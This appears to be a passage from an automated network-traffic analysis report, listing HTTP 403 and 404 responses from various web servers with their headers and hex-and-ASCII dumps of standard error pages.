                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Mar 2023 06:56:14 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:14 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:56:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 71850c90-5625-4d13-be77-2cb43a698c0fCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6a09CaIdhjX4GqDiY9Q%2Fn8YFNLNoVYUbeE0tjC7riuePgFsTKTvFAnmAcuEdvjKZ%2F%2BTkBK1PrukZm310Vi7TtB3ecL7fA1yMfTqcj9kv5A7AHuqWWIErymv1uMCc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=173.000097Server: cloudflareCF-RAY: 7a59a81bd96d904e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:14 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:56:14 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: gjn6hMUW/IzzjuegjData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:56:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 0d5702f1-a4d2-4b6c-ab7c-1fd5eb21ab00CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nqUGHR9rhAj7cGy9hv9iokcKCK1Ca7oLV6LOWusiX1ZRdQ9lZMAQt4%2BI1qFMjSEbjcobREUTcts4ALtph47e9ffYgORyWaKtR%2F0SyMFrHRYuxMohtjg9T849mRtb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=168.999910Server: cloudflareCF-RAY: 7a59a81ccfc45c50-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:14 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:15 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:15 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 10 Mar 2023 06:56:15 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:56:15 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 03:20:42 GMTAccept-Ranges: bytesContent-Length: 1260Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:15 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.1.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:15 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=299Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 10 Mar 2023 06:56:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 